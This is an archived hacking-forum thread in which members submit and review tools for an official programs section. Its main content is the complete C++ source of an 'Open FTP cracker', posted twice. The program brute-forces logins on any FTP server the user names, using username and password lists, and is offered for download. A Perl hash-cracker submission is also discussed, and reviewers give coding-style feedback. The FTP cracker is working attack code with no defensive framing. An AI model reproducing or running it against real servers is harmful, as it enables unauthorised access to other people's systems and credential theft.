+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Hacking Tools (https://sinister.ly/Forum-Hacking-Tools)
+--- Thread: Your program in the official HC Programs? (/Thread-Your-program-in-the-official-HC-Programs)
RE: Your program in the official HC Programs? - Gentleman of Science - 09-13-2013
Good feed back. Thanks, I made an incorrect assumption that you guys would respond a bit faster... Sorry. I agree, its simple, though I was kind of going for a simple and cross system no need to make a huge compile of it program. I wanted to make my program more elegant, smaller, and lighter rather than feature filled. Though, if you think I should put more stuff in it, please suggest more stuff
I would love the challenge to add it. As someone who uses JTR a lot, my idea was to make a hash cracking program that I could bring to any system and run it fast without compiling it (note I know it does compile before running but a much lighter compile). Note, this is also my first time writing a perl program. I thought this would be a fun way to jump in. Note2, I am pretty new to hacking/cracking so Im going to doubt that this will be approved...
RE: Your program in the official HC Programs? - Deque - 09-13-2013
Thanks for your entry, gentleman, but don't be impatient, you posted in the middle of the night (for me) where I obviously sleep. We are not all in the same time zone here.
(09-12-2013, 09:48 PM)Gentleman of Science Wrote: Perl has a hard time with HUGE files. I tried to use a 2gb file and just couldnt get it to load.
That's not because of language Perl, but because of your coding. You load the whole file at once into memory. Of course you will run into trouble if it gets a certain size. Don't blame Perl for this. My first suggestion: Correct this. Load the file in chunks, like @ArkPhaze said.
Very fast is a bit exaggerated. Yes, you have precomputed hashes, but yet not the advantage rainbow tables will provide (in speed and memory). So my second suggestion: Use rainbow tables instead of a list with precomputed hashes.
While multithreading is one way to improve performance, it won't help in Perl. Like with most interpreted languages you won't have any speed improvement at all using threads, for reasons read here: http://www.perlmonks.org/index.pl?node_id=288022
So far I agree with @"ArkPhaze".
You may submit your entry again after the refinements.
Regards
Deque
RE: Your program in the official HC Programs? - Gentleman of Science - 09-13-2013
Thanks for your suggestions
Its 2:00 AM here... But I will work long into the night. I will start redoing my code so it loads it in chunks! I also got on the fly hash generation down. I didn't finish your suggestions yet but Ill update the code anyway.
RE: Your program in the official HC Programs? - Dreamwalker - 10-11-2013
![[Image: ftp%20crack%20screen.jpg.opt646x321o0%2C0s646x321.jpg]](http://dreamwalk.yolasite.com/resources/ftp%20crack%20screen.jpg.opt646x321o0%2C0s646x321.jpg)
Open FTP cracker:
This is a remote password cracker for FTP servers that performs dictionary attacks in real time, which is very accurate. It uses WinInet and is coded in C++, you can add as many usernames and passwords to the files as you want and choose any target. As the title suggests it's completely open source (but please read our terms and conditions) and it includes a compiled win32 version, along with the "usernames.txt" and "passwords.txt" files with some basic combinations to get you started.
Note: as this is only beta, their are some things that need improving, such as the kill connection throttle to speed up cracking attempt iterations so keep checking for updates.
DOWNLOAD
Source code, just in case anyone wants a quick read:
Code:
#include <windows.h>
#include <wininet.h>
#include <iostream>
#include <string>
#include <fstream>
using namespace std;
#pragma comment(lib, "Wininet")
int main()
{
SetConsoleTitle("Open FTP cracker coded by Dreamwalker - HackCommunity.com, http://Dreamwalk.yolasite.com/");
cout<<"Open FTP cracker beta 1.0 coded by Dreamwalker\n_________________________________________________\n"<<endl;
string usernames = "", passwords = "", target = "";
//init wininet functions
HINTERNET hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
if(!hInternet)
{
cout<<"Error starting WinInet, closing"<<endl;
Sleep(1500);
return -1;
}
//get files
ifstream user_reader("usernames.txt");
ifstream pass_reader("passwords.txt");
//file error handling
if((!user_reader)||(!pass_reader))
{
cout<<"Error opening one of the input files, closing..."<<endl;
cout<<"ensure \"usernames.txt\" and \"passwords.txt\" are in the same"<<endl;
cout<<"directory as this application\n"<<endl;
Sleep(15000);
return -1;
}
//get target server
cout<<"What is the target FTP server?:"<<endl;
cin>>target;
//get first username to be used in loop
getline(user_reader,usernames);
//go through all passwords on one username then continue to next username until list has finished
int attempts = 0;
HINTERNET hFtpSession = NULL;
while(!user_reader.eof())
{
attempts++;
//clear screen lazy way, to be changed
system("cls");
getline(pass_reader,passwords);
cout<<"\nCracking in progress, target = "<<target<<endl;
cout<<"Trying username "+usernames+" with password "+passwords+" attempts "<<attempts<<" ";
//Connect to FTP server with provided credentials
hFtpSession = InternetConnect(hInternet,target.c_str(),INTERNET_DEFAULT_FTP_PORT,usernames.c_str(),passwords.c_str(), INTERNET_SERVICE_FTP,INTERNET_FLAG_PASSIVE,0);
//is password cracked?
if(!hFtpSession)
{
cout<<" = FAIL"<<endl;
}
else if(hFtpSession)
{
cout<<"\nOwned target of "<<target<<endl;
cout<<"\n\nCracked!, the username is "+usernames+" and password is "+passwords<<endl;
break;
}
if(pass_reader.eof())
{
//reset pass file
pass_reader.clear();
pass_reader.seekg(0,ios::beg);
//get next username
getline(user_reader,usernames);
}
}
InternetCloseHandle(hInternet);
pass_reader.close();
user_reader.close();
cout<<"\nFinished, will close in 5 mins (or do it manually)"<<endl;
Sleep(300000);
return 0;
}RE: Your program in the official HC Programs? - Dreamwalker - 10-11-2013
Open FTP cracker:
This is a remote password cracker for FTP servers that performs dictionary attacks in real time, which is very accurate. It uses WinInet and is coded in C++, you can add as many usernames and passwords to the files as you want and choose any target. As the title suggests it's completely open source (but please read our terms and conditions) and it includes a compiled win32 version, along with the "usernames.txt" and "passwords.txt" files with some basic combinations to get you started.
Note: as this is only beta, their are some things that need improving, such as the kill connection throttle to speed up cracking attempt iterations so keep checking for updates.
DOWNLOAD
Source code, just in case anyone wants a quick read:
Code:
#include <windows.h>
#include <wininet.h>
#include <iostream>
#include <string>
#include <fstream>
using namespace std;
#pragma comment(lib, "Wininet")
int main()
{
SetConsoleTitle("Open FTP cracker coded by Dreamwalker - HackCommunity.com, http://Dreamwalk.yolasite.com/");
cout<<"Open FTP cracker beta 1.0 coded by Dreamwalker\n_________________________________________________\n"<<endl;
string usernames = "", passwords = "", target = "";
//init wininet functions
HINTERNET hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
if(!hInternet)
{
cout<<"Error starting WinInet, closing"<<endl;
Sleep(1500);
return -1;
}
//get files
ifstream user_reader("usernames.txt");
ifstream pass_reader("passwords.txt");
//file error handling
if((!user_reader)||(!pass_reader))
{
cout<<"Error opening one of the input files, closing..."<<endl;
cout<<"ensure \"usernames.txt\" and \"passwords.txt\" are in the same"<<endl;
cout<<"directory as this application\n"<<endl;
Sleep(15000);
return -1;
}
//get target server
cout<<"What is the target FTP server?:"<<endl;
cin>>target;
//get first username to be used in loop
getline(user_reader,usernames);
//go through all passwords on one username then continue to next username until list has finished
int attempts = 0;
HINTERNET hFtpSession = NULL;
while(!user_reader.eof())
{
attempts++;
//clear screen lazy way, to be changed
system("cls");
getline(pass_reader,passwords);
cout<<"\nCracking in progress, target = "<<target<<endl;
cout<<"Trying username "+usernames+" with password "+passwords+" attempts "<<attempts<<" ";
//Connect to FTP server with provided credentials
hFtpSession = InternetConnect(hInternet,target.c_str(),INTERNET_DEFAULT_FTP_PORT,usernames.c_str(),passwords.c_str(), INTERNET_SERVICE_FTP,INTERNET_FLAG_PASSIVE,0);
//is password cracked?
if(!hFtpSession)
{
cout<<" = FAIL"<<endl;
}
else if(hFtpSession)
{
cout<<"\nOwned target of "<<target<<endl;
cout<<"\n\nCracked!, the username is "+usernames+" and password is "+passwords<<endl;
break;
}
if(pass_reader.eof())
{
//reset pass file
pass_reader.clear();
pass_reader.seekg(0,ios::beg);
//get next username
getline(user_reader,usernames);
}
}
InternetCloseHandle(hInternet);
pass_reader.close();
user_reader.close();
cout<<"\nFinished, will close in 5 mins (or do it manually)"<<endl;
Sleep(300000);
return 0;
}RE: Your program in the official HC Programs? - Deque - 10-11-2013
Thanks for the submission.
Edit: Forget what I said before, the image didn't show anything HC related, but the code does.
I will have to look through it and since this is C++, I would also like @ArkPhaze to have a look at it.
RE: Your program in the official HC Programs? - ArkPhaze - 10-13-2013
1.
Code:
//clear screen lazy way, to be changed
system("cls");2. No call to InternetCloseHandle() on hFtpSession.
3. Why pipe the value from cin to target if you use getline() to populate the other string's?
Code:
std::getline(std::cin, _____);4. A bit abusive of Sleep() when you can normally just await user input to make sure that they have read whatever text you have to display. What if they leave their computer while this program runs? They're not guaranteed to be back at the PC the moment in time it completes and before Sleep() has finished executing.
5. Also not particularly keen on this line:
Code:
using namespace std;RE: Your program in the official HC Programs? - Dreamwalker - 10-14-2013
(10-13-2013, 05:43 AM)ArkPhaze Wrote: 1.
Code://clear screen lazy way, to be changed
system("cls");
2. No call to InternetCloseHandle() on hFtpSession.
3. Why pipe the value from cin to target if you use getline() to populate the other string's?
Code:std::getline(std::cin, _____);
4. A bit abusive of Sleep() when you can normally just await user input to make sure that they have read whatever text you have to display. What if they leave their computer while this program runs? They're not guaranteed to be back at the PC the moment in time it completes and before Sleep() has finished executing.
5. Also not particularly keen on this line:
Code:using namespace std;
@ArkPhaze
The system call can be changed, I could just print out each statement for now, no big deal as this program is windows dependent anyway as it uses wininet.
You don't need to close the handle on the ftp session as that would close the connection, and that needs to stay live during the cracking process, furthermore InternetCloseHandle(hInternet); is the parent, so it respectively closes the ftp session at the end of cracking (successful or not).
I can changed the sleep call, but, if they run it from the command line they'll still see the results.
And whether you're a fan of the namespace or not is irrelevant, the fact is I use the std:: prefix a lot in my code, so it makes sense to use that namespace.
RE: Your program in the official HC Programs? - ArkPhaze - 10-14-2013
(10-14-2013, 12:36 PM)Dreamwalker Wrote:(10-13-2013, 05:43 AM)ArkPhaze Wrote: 1.
Code://clear screen lazy way, to be changed
system("cls");
2. No call to InternetCloseHandle() on hFtpSession.
3. Why pipe the value from cin to target if you use getline() to populate the other string's?
Code:std::getline(std::cin, _____);
4. A bit abusive of Sleep() when you can normally just await user input to make sure that they have read whatever text you have to display. What if they leave their computer while this program runs? They're not guaranteed to be back at the PC the moment in time it completes and before Sleep() has finished executing.
5. Also not particularly keen on this line:
Code:using namespace std;
@ArkPhaze
The system call can be changed, I could just print out each statement for now, no big deal as this program is windows dependent anyway as it uses wininet.
You don't need to close the handle on the ftp session as that would close the connection, and that needs to stay live during the cracking process, furthermore InternetCloseHandle(hInternet); is the parent, so it respectively closes the ftp session at the end of cracking (successful or not).
I can changed the sleep call, but, if they run it from the command line they'll still see the results.
And whether you're a fan of the namespace or not is irrelevant, the fact is I use the std:: prefix a lot in my code, so it makes sense to use that namespace.
"The system call can be changed, I could just print out each statement for now, no big deal as this program is windows dependent anyway as it uses wininet." - You don't at all understand fully why system() calls are bad by this statement, as system() is not bad to be using just because it is a Windows only call. That's should be the least of your worries. http://www.cplusplus.com/forum/articles/11153/
"I can changed the sleep call, but, if they run it from the command line they'll still see the results." - This is the way it should be.
"And whether you're a fan of the namespace or not is irrelevant, the fact is I use the std:: prefix a lot in my code, so it makes sense to use that namespace. " - How much you use it is irrelevant, what you use from that namespace IS relevant, and you only really use a few of the many things available to that namespace. There's no excuse for laziness, here's a good topic on why you shouldn't use it: http://stackoverflow.com/questions/1452721/why-is-using-namespace-std-considered-bad-practice
RE: Your program in the official HC Programs? - Deque - 10-15-2013
Great links @"ArkPhaze".
I suggest that you, @"Dreamwalker", correct the code and then open a thread with your program. I will move it to the HC Official section.